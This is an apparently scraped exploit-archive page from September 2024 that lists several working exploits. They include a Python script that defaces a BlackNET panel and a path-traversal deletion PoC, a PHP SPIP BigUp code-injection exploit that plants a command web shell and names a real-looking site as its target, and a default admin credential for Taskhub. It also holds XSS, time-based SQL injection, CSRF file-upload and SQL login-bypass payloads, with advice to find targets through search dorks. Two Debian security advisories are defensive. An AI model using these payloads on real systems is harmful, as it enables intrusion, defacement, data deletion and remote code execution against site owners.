BlackNET version 3.7.0.0 appears to allow unauthenticated access to modify data and suffers from arbitrary file deletion and directory traversal vulnerabilities while authenticated.

    # Exploit Title: BlackNET - Multiple Vulnerabilities# Exploit Author: bRpsd# Date: 20/09/2024# Vendor Homepage: https://github.com/AndroVirus# Software Link: https://github.com/AndroVirus/BlackNET/# Version: v3.7.0.0# Tested on: MacOS - Xampp# CVE: NAimport requests# Define the target URL for the POST requestpost_url = "http://localhost/x/BlackNET/BlackNET%20Panel/post.php"# Defaces the homepagepayload = "Nothing to see here."data = {    'folder_name': 'www',  # this can create any folder on the server    'file_name': 'index.html',  # Name of the file to be created    'data': payload  # The payload being tested}# Send the POST requestresponse = requests.post(post_url, data=data)# Check the responseif response.status_code == 200:    print("Request successful. Check if 'file' was created.")else:    print(f"Request failed with status code: {response.status_code}")    # Vulnerable code: /BlackNET/BlackNET%20Panel/post.php# header('Content-type: text/html; charset=utf-8');## require_once 'config/config.php';# require_once APP_PATH . 'classes/POST.php';## if ($_SERVER['REQUEST_METHOD'] == "POST") {#  $POST = new BlackNET\POST();# $folder_name = isset($_POST['folder_name']) && $_POST['folder_name'] != "" ? $_POST['folder_name'] : 'www';#    $file_name = isset($_POST['file_name']) ? $_POST['file_name'] : "unknown.txt";##   $data = $POST->sanitize($_POST['data']);##  $POST->prepare($folder_name, $file_name, $data);## $POST->write();   ############################################################################################# Arbitrary File Deletion & Directory Traversal [Authenticated]# File: rmfile.php# Parameter: fname# Vul Code:#<?php# require_once 'session.php';#$msg = "";#$id = "";#if ($_SERVER['REQUEST_METHOD'] == "POST") {#    $files = $_POST['file'];#    $vicid = $utils->sanitize($_POST['vicid']);#    if ($auth->checkToken($_POST['csrf'], $_SESSION['csrf'])) {#        foreach ($files as $file) {#if (strpos($file, "../")) {#                $id = $vicid;#                $msg = "error";#            }#            $filename = $utils->sanitize($file);#            $real_path = realpath("upload" . "/" . $vicid . "/" . $filename);#            if (file_exists($real_path)) {#                unlink($real_path);### Proof Of Concept:# http://localhost/x/BlackNET/BlackNET%20Panel/rmfile.php?fname=../favico.png&vicid=&csrf=95a6ae14d491e482b4370da1fd74f69891058f12472e6510e373889d99d84c3c

BlackNET 3.7.0.0 Missing Authentication / File Deletion / Traversal

SPIP BigUp version 4.2.15 suffers from a remote PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : SPIP BigUp 4.2.15 php code injection Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This exploits a php code injection vulnerability in the BigUp plugin of SPIP.    The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value.   By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server.   It allows unauthenticated users to execute arbitrary code remotely via the public interface. [+] Line 143 : Set your target & payload .[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass indoushka {    private $targetUri;    private $formPage;    private $payload;    public function __construct($targetUri, $formPage = 'auto', $payload) {        $this->targetUri = $targetUri;        $this->formPage = $formPage;        $this->payload = $payload;    }    public function check() {        $spipVersion = $this->getSpipVersion();        if (!$spipVersion) {            return "Unable to determine the version of SPIP.";        }        echo "SPIP Version detected: " . $spipVersion . "\n";        $vulnerableRanges = [            ['start' => '4.0.0', 'end' => '4.1.17'],            ['start' => '4.2.0', 'end' => '4.2.15'],            ['start' => '4.3.0', 'end' => '4.3.1']        ];        $isVulnerable = false;        foreach ($vulnerableRanges as $range) {            if (version_compare($spipVersion, $range['start'], '>=') && version_compare($spipVersion, $range['end'], '<=')) {                $isVulnerable = true;                break;            }        }        if (!$isVulnerable) {            return "The detected SPIP version ($spipVersion) is not vulnerable.";        }        echo "SPIP version $spipVersion is vulnerable.\n";        return "SPIP version $spipVersion is vulnerable.";    }    private function getSpipVersion() {        // This function should make an HTTP request to detect the SPIP version        // Return the version or false if undetectable        return '4.3.1'; // Example version, replace with actual logic    }    private function getFormData() {        $pages = ['login', 'spip_pass', 'contact'];        if ($this->formPage !== 'auto') {            $pages = [$this->formPage];        }        foreach ($pages as $page) {            $url = $this->normalizeUri($page);            $response = $this->sendRequest('GET', $url);            if ($response['status'] === 200) {                libxml_use_internal_errors(true); // Prevent warnings from invalid HTML                $doc = new DOMDocument();                @$doc->loadHTML($response['body']);                libxml_clear_errors();                $inputs = $doc->getElementsByTagName('input');                if ($inputs->length > 1) {                    $action = $inputs->item(0)->getAttribute('value');                    $args = $inputs->item(1)->getAttribute('value');                                        if ($action && $args) {                        echo "Found formulaire_action: $action\n";                        echo "Found formulaire_action_args: " . substr($args, 0, 20) . "...\n";                        return ['action' => $action, 'args' => $args];                    }                }            }        }        return null;    }    private function normalizeUri($page) {        return rtrim($this->targetUri, '/') . '/' . ltrim($page, '/');    }    private function sendRequest($method, $url, $data = null) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        if ($method === 'POST' && $data) {            curl_setopt($ch, CURLOPT_POST, true);            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);            curl_setopt($ch, CURLOPT_HTTPHEADER, [                'Content-Type: multipart/form-data; boundary=' . substr($data, 2, 32)            ]);        }        $response = curl_exec($ch);        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);        curl_close($ch);        return ['status' => $httpCode, 'body' => $response];    }    private function encodePayload() {        return base64_encode($this->payload);    }    public function exploit() {        $formData = $this->getFormData();        if (!$formData) {            echo "Could not retrieve formulaire_action or formulaire_action_args value from any page.\n";            return;        }        echo "Preparing to send exploit payload to the target...\n";        $encodedPayload = $this->encodePayload();        $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));        $postData = "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action"' . "\r\n\r\n" . $formData['action'] . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="bigup_retrouver_fichiers"' . "\r\n\r\n" . $this->randomString() . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="' . $this->randomString() . '[".base64_decode(\'' . $encodedPayload . '\').die()."]"; filename="' . $this->randomString() . '"' . "\r\n\r\n\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action_args"' . "\r\n\r\n" . $formData['args'] . "\r\n";        $postData .= "--$boundary--\r\n";        $this->sendRequest('POST', $this->normalizeUri('spip.php'), $postData);    }    private function randomString($length = 8) {        return bin2hex(random_bytes($length / 2));    }}// Usage example:$exploit = new indoushka('https://yonnelautre.fr/', 'auto', '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>');$exploit->check();$exploit->exploit();?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP BigUp 4.2.15 Code Injection

Taskhub version 3.0.3 suffers from an ignored default credential vulnerability.

**Taskhub 3.0.3 Insecure Settings**

Posted Sep 20, 2024

Authored by indoushka

Taskhub version 3.0.3 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 7505071b9896db1b7f4f5cd911d9d07b06247bd94dbf46777a4481d4b83f1ddd

Download | Favorite | View

**Taskhub 3.0.3 Insecure Settings**

    =============================================================================================================================================| # Title     : Taskhub v3.0.3 Insecure Settings Vulnerability                                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 12345678[+] https://www/127.0.0.1/tasks.octalfoxcom/auth/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,862)
*   Arbitrary (17,077)
*   BBS (2,859)
*   Bypass (1,923)
*   CGI (1,047)
*   Code Execution (7,902)
*   Conference (692)
*   Cracker (845)
*   CSRF (3,427)
*   DoS (25,263)
*   Encryption (2,395)
*   Exploit (54,266)
*   File Inclusion (4,274)
*   File Upload (1,017)
*   Firewall (822)
*   Info Disclosure (2,916)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,281)
*   Local (14,850)
*   Magazine (587)
*   Overflow (13,223)
*   Perl (1,435)
*   PHP (5,271)
*   Proof of Concept (2,411)
*   Protocol (3,749)
*   Python (1,660)
*   Remote (31,888)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (642)
*   Scanner (1,658)
*   Security Tool (8,048)
*   Shell (3,305)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,725)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,092)
*   Web (10,138)
*   Whitepaper (3,784)
*   x86 (970)
*   XSS (18,301)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,114)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,124)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (389)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,237)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,845)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,852)
*   UNIX (9,456)
*   UnixWare (188)
*   Windows (6,772)
*   Other

Taskhub 3.0.3 Insecure Settings

Teacher Subject Allocation Management System version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Teacher Subject Allocation Management System 1.0 XSS Vulnerability                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] In the search box, put your payload.[+] use payload : <script>alert(/indoushka/);</script>[+] http://127.0.0.1/tsas/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Teacher Subject Allocation Management System 1.0 Cross Site Scripting

WordPress LMS plugin versions 4.2.7 and below suffer from a remote SQL injection vulnerability.

    # CVE-2024-8522LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields'## Stack```txtclass-lp-db.php:702, LP_Database->execute()class-lp-course-db.php:564, LP_Course_DB->get_courses()Courses.php:241, LearnPress\Models\Courses::get_courses()class-lp-rest-courses-v1-controller.php:502, LP_Jwt_Courses_V1_Controller->get_courses()class-wp-rest-server.php:1230, WP_REST_Server->respond_to_request()class-wp-rest-server.php:1063, WP_REST_Server->dispatch()class-wp-rest-server.php:439, WP_REST_Server->serve_request()rest-api.php:420, rest_api_loaded()class-wp-hook.php:324, WP_Hook->apply_filters()class-wp-hook.php:348, WP_Hook->do_action()plugin.php:565, do_action_ref_array()class-wp.php:418, WP->parse_request()class-wp.php:813, WP->main()functions.php:1336, wp()wp-blog-header.php:16, require()index.php:17, {main}()```## <>```txtSELECT <> FROM wp_posts AS p WHERE 1=1 AND p.post_type = 'lp_course' AND p.post_status IN ('publish') ORDER BY post_date DESC LIMIT 0, 10```## PoC```httpGET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(10)),0) HTTP/1.1Host: localhost:8077User-Agent: curl/7.81.0Cookie: XDEBUG_SESSION=PHPSTORMAccept: */*```

WordPress LMS 4.2.7 SQL Injection

Online Traffic Offense version 1.0 suffers from cross site request forgery and arbitrary file upload vulnerabilities.

    =============================================================================================================================================| # Title     : Online Traffic Offense 1.0 Auth by Pass Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/traffic_offense_1.zip                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This HTML page is designed to remotely upload arbitrary files and modify script settings.[+] Line 33 : Set your target url[+] save payload as poc.html [+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Direct File Upload</title></head><body>    <h2>Direct File Upload</h2>    <form id="uploadForm">        <label for="fileInput">Select File:</label>        <input type="file" id="fileInput" name="fileInput" required><br><br>        <button type="button" onclick="uploadFile()">Upload File</button>    </form>    <script>        function uploadFile() {            const fileInput = document.getElementById('fileInput').files[0];            if (!fileInput) {                alert('Please select a file.');                return;            }            const formData = new FormData();            formData.append('name', '<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>');            formData.append('img', fileInput);            console.log("(+) Uploading file...");            fetch('http://127.0.0.1/traffic_offense/classes/SystemSettings.php?f=update_settings', { // Replace with your upload URL                method: 'POST',                body: formData            })            .then(response => response.text())            .then(data => {                if (data === '1') {                    console.log("(+) File upload seems to have been successful!");                } else {                    console.log("(-) Oh no, the file upload seems to have failed!");                }            })            .catch(error => console.error("(-) Error during file upload:", error));        }    </script></body></html>        Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Traffic Offense 1.0 CSRF / Arbitrary File Upload

Debian Linux Security Advisory 5771-1 - Fabien Potencier discovered that under some conditions the sandbox mechanism of Twig, a template engine for PHP, could by bypassed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5771-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffSeptember 17, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php-twigCVE ID         : CVE-2024-45411Fabien Potencier discovered that under some conditions the sandboxmechanism of Twig, a template engine for PHP, could by bypassed.For the stable distribution (bookworm), this problem has been fixed inversion 3.5.1-1+deb12u1.We recommend that you upgrade your php-twig packages.For the detailed security status of php-twig please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php-twigFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbp6wEACgkQEMKTtsN8TjbMmw/9EQoKouvCA3UV7O8WQPnfbILtLGGR4ezpswEqDtV1BRJTtGsa0BL5P4RY7ut8k9pLs/yyUtAjzk5CwikchUFaOYyK8ZHlHugOj3QC2AtdyP8WEqeM226rIqUbTUdO1wcpzVTN4HTl4pKbHYRYNGa8O16sDQsiM805zdauLnbM+LJJpBmoaok6dcg9cNHQ0nUinMoFPU2f2Ap2tDzre+r1CJ8tNajEhD8FZFSXX+50hgooS6hSBA4yATNaMrOYuXetNgG+hF+7LI5zJnERLhzCFiqNc0Kx3G9YWhUNAsIkURB5PIyUQf1Oi4hriUfRGY1MuR7qhCZiDJF3PJxX99eRAijO8wx+pm0FqD8lhQE6X2yniCEY0Nv4ofWX5VAoG7MnZXbFnYGlmoAcqs3BjlYLCX9p11fkfZpOfFyuOyEYVMNJbf8wYB0PIyfzbcf9PiBkV2HdawCUmZEqo4MKJ1/4RpLMk28VZbbD4vGlldGSG9gjSG+r2gfqHKayVvfmp/N0gWaD3H0PQ8NZdXWidqrdy4SmeFLclNC0gYC9XqVe6Xa1PgDgRNw4mdqxuI68/orZeQC3eeXSEjhk41iXDRaWZMG5PFIXAubpFnRrnje+uIl1xNP99w8y/qLRFOWHOYo9//0j6/ohNxJEX44l9zbIphiO8ljPUYu4Ai2eozwdxFE==WH+j-----END PGP SIGNATURE-----

Debian Security Advisory 5771-1

Debian Linux Security Advisory 5770-1 - Shang-Hung Wan discovered multiple vulnerabilities in the Expat XML parsing C library, which could result in denial of service or potentially the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5770-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffSeptember 17, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : expatCVE ID         : CVE-2024-45490 CVE-2024-45491 CVE-2024-45492Shang-Hung Wan discovered multiple vulnerabilities in the ExpatXML parsing C library, which could result in denial of service orpotentially the execution of arbitrary code.For the stable distribution (bookworm), these problems have been fixed inversion 2.5.0-1+deb12u1.We recommend that you upgrade your expat packages.For the detailed security status of expat please refer toits security tracker page at:https://security-tracker.debian.org/tracker/expatFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbp6EIACgkQEMKTtsN8Tjb+0hAAsAHl9didzh1S8vHaLH8P8I1XT0302RGP1N6r4BKvjEozuTKml28F3NEK9IplBZXH8GM6tnF1/gRJf5Dp4YsL7H+nYUjbkZEdLM2TztRoy4wnITxUwqQ7q1ly/bWMuyaoUn9jZu6SA+yEL68DtbXpFbs8IAOE3kqPsbcWvJ7O7LU3Ajjw5aWYwxV0kdVyI67rBkfWAdyFRjlkxF62+ieR9sjpKNDKK1nmO+I8eEF5E/WOXsfPlzcKwax2mMhisTscEIvaBSKCaQICCojYbvju8KW8B+NsJMsyRbPoimTyzE2n4VBk0ZNHjv+wsIddwdgzXpWHHRbVtl6zjiZvzxUtphp6tHstxoW8YZQKkQiwqqlpONqXKWG1yR0opltUr7JjTylDo41M21yK/WizdxFkdrUJi4drKTONekvbhUEaTLaoR/ywYi0Za7T0sUguAJk25id2px3LdTvMhQywTNmL103LkFfq1WIXL9x+yzYdKos8P3qu9DIaIqmsR4dy2xMhiJwVyQXi74Tte9h5n6FXET1Z8MoyxFOVI6SQ5FBXJMmL48r6Uwhb09tHZL2VNUequSC2L4uGozFFaHvr3M606srokRbo18XvNTNUvApJjAFt/WTnOjKUDuJM08PjLw6brD/XBR6p/NKX8vMQmmXClyKwB97SG1MYu/MfdJK/7wQ==bEe8-----END PGP SIGNATURE-----

Debian Security Advisory 5770-1

Online Bus Ticket Booking Website version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : online bus ticket booking Website v1.0 Auth By PAss Vulnerability                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_online-bus-ticket-booking-.zip           |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] User : 'or''='@gmail.com & PAss = 'or''='[+] http://127.0.0.1/online-bus-ticket-booking-Website/login.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Bus Ticket Booking Website 1.0 SQL Injection

Nipah Virus Testing Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Nipah virus (NiV) – Testing Management System 1.0 Auth By Pass Vulnerability                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/nipah-virus-niv-testing-management-system-using-php-and-mysql/                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer & PASs : ' or 0=0 ##[+] http://127.0.0.1/nipah-tms/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Tag

#php